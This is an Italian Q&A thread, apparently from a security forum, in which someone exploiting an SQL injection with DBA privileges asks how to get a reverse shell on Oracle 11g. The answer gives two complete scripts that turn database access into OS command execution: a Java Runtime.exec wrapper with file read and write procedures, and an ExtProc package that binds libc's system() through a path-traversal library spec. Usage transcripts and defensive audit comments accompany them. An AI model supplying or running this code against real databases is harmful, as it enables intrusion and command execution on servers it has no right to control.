Oracle Sql Injection Shell inverso [chiuso]


Sto testando una SQL injection su un sito web che usa codice ASP. Riesco a enumerare con successo tutti i database e le tabelle. L'utente corrente ha i privilegi DBA. Mi chiedo come si possa ottenere una shell inversa sfruttando questa SQL injection. La versione di Oracle è "Oracle Database 11g Enterprise Edition versione 11.1.0.7.0".

    
posta user1968957 02.08.2015 - 17:50
fonte

1 risposta


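Puoi provare questi due modi per eseguire codice sul DBMS Oracle. Nota che entrambi gli script, come mostrano i rispettivi esempi d'uso, presuppongono una sessione sqlplus interattiva come sysdba, e che la trascrizione del secondo proviene da Oracle9i 9.2.0.1.0, non dalla 11.1.0.7.0 della domanda: servono quindi soprattutto a capire quali funzionalità (Java nel database, ExtProc) permettono l'esecuzione di comandi e vanno perciò limitate e controllate.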

Il primo usa codice Java: link

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

-- Loads and resolves a Java source object named "oraexec" inside the database.
-- Its three static methods are the targets of the javacmd / javareadfile /
-- javawritefile call specs defined further down in this script.
-- The code runs inside the database server, so processes and file access use
-- the OS account that owns the Oracle processes (the usage transcript above
-- shows the resulting files owned by "oracle").
-- NOTE(review): from a defender's side, the things to audit are unexpected
-- JAVA SOURCE / JAVA CLASS objects in DBA_OBJECTS and file "execute"
-- permissions listed in DBA_JAVA_POLICY; Runtime.exec normally succeeds only
-- where such a java.io.FilePermission has been granted.
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
    /*
     * Command execution module.
     * Starts the given command line as a child process of the database JVM.
     * The returned Process handle is discarded: output and exit status are
     * never read, and the call does not wait for the command to finish.
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module.
     * Prints the named file line by line to System.out. Per the usage notes
     * in this script, the output is only visible in sqlplus after
     * dbms_java.set_output and "set serveroutput on".
     * The reader is closed only on the normal path (no try/finally).
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module.
     * Opens the named file in append mode and writes the given line followed
     * by a newline; existing content is kept.
     * The writer is closed only on the normal path (no try/finally).
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- PL/SQL call spec publishing oraexec.execCommand(String) as the procedure
-- javacmd; p_command is passed through unchanged as the command line.
-- usage: exec javacmd('command');
-- NOTE(review): a procedure like this turns EXECUTE on one database object
-- into OS command execution as the database's OS account. Treat an unexpected
-- "language java" call spec bound to a Runtime.exec wrapper as an indicator of
-- compromise, and review who holds CREATE PROCEDURE and the related Java
-- permissions.
create or replace procedure javacmd(p_command varchar2) as
language java           
name 'oraexec.execCommand(java.lang.String)';
/

-- PL/SQL call spec publishing oraexec.readFile(String) as the procedure
-- javareadfile; the file content is written to the Java output stream, which
-- is why the usage below first redirects it with dbms_java.set_output.
-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
-- NOTE(review): readable files are whatever the database's OS account and the
-- granted java.io.FilePermission "read" entries allow; keep those grants
-- narrow and audit them in DBA_JAVA_POLICY.
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
/

-- PL/SQL call spec publishing oraexec.writeFile(String, String) as the
-- procedure javawritefile; each call appends p_line plus a newline to the
-- file named by p_filename.
-- usage: exec javawritefile('/path/to/file', 'line to append');
-- NOTE(review): writable locations depend on the database's OS account and on
-- the granted java.io.FilePermission "write" entries; unexpected files owned
-- by the Oracle OS account (as in the /tmp listing of the usage transcript)
-- are a useful host-side detection signal.
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
/

Il secondo usa ExtProc: link

-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
-- Registers the 32-bit system C library as an external-procedure library
-- under the name exec_shell32. The file spec is anchored at $ORACLE_HOME/bin
-- but uses "../" segments to resolve to /lib/32/libc.so.1 outside the Oracle
-- home (the ORA-06522 message in the usage transcript shows the expanded path).
-- NOTE(review): presumably the $ORACLE_HOME/bin prefix is there to satisfy a
-- location check on ExtProc libraries -- confirm for the release in use.
-- Defensive checks: restrict CREATE LIBRARY / CREATE ANY LIBRARY, allowlist
-- loadable libraries with the EXTPROC_DLLS setting, and audit DBA_LIBRARIES
-- for FILE_SPEC values that contain ".." or point at system libraries.
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
-- Registers the 64-bit system C library as an external-procedure library
-- under the name exec_shell64. The file spec is anchored at $ORACLE_HOME/bin
-- but uses "../" segments to resolve to /lib/64/libc.so.1 outside the Oracle
-- home.
-- NOTE(review): presumably the $ORACLE_HOME/bin prefix is there to satisfy a
-- location check on ExtProc libraries -- confirm for the release in use.
-- Defensive checks: restrict CREATE LIBRARY / CREATE ANY LIBRARY, allowlist
-- loadable libraries with the EXTPROC_DLLS setting, and audit DBA_LIBRARIES
-- for FILE_SPEC values that contain ".." or point at system libraries.
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
-- The specification declares a single procedure, exec(cmdstring); the body
-- binds it as an external C procedure to the symbol "system" in the library
-- exec_shell32, so the string is handed to the C library's system() call by
-- the external-procedure agent.
-- On a 64-bit installation this variant fails to load: the usage transcript
-- shows ORA-06520 / ORA-06522 with "wrong ELF class: ELFCLASS32".
-- NOTE(review): a package whose body maps a procedure to "system" in libc has
-- no legitimate application use; its presence, or ORA-06520 errors naming
-- libc in the alert/trace logs, is worth alerting on.
create or replace package oracmd32 as
    -- cmdstring: command line passed unchanged to the external routine
    procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
    -- External call spec: C symbol "system" resolved from exec_shell32
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell32
    language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
-- The specification declares a single procedure, exec(cmdstring); the body
-- binds it as an external C procedure to the symbol "system" in the library
-- exec_shell64, so the string is handed to the C library's system() call by
-- the external-procedure agent.
-- In the usage transcript (Oracle9i 9.2.0.1.0, 64-bit) the resulting file is
-- owned by the "oracle" OS account, i.e. commands run with that account's
-- rights.
-- NOTE(review): a package whose body maps a procedure to "system" in libc has
-- no legitimate application use; alert on such objects and keep ExtProc
-- disabled or restricted where external procedures are not needed.
create or replace package oracmd64 as
    -- cmdstring: command line passed unchanged to the external routine
    procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
    -- External call spec: C symbol "system" resolved from exec_shell64
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell64
    language c;
end oracmd64;
/
    
risposta data 02.08.2015 - 19:27
fonte
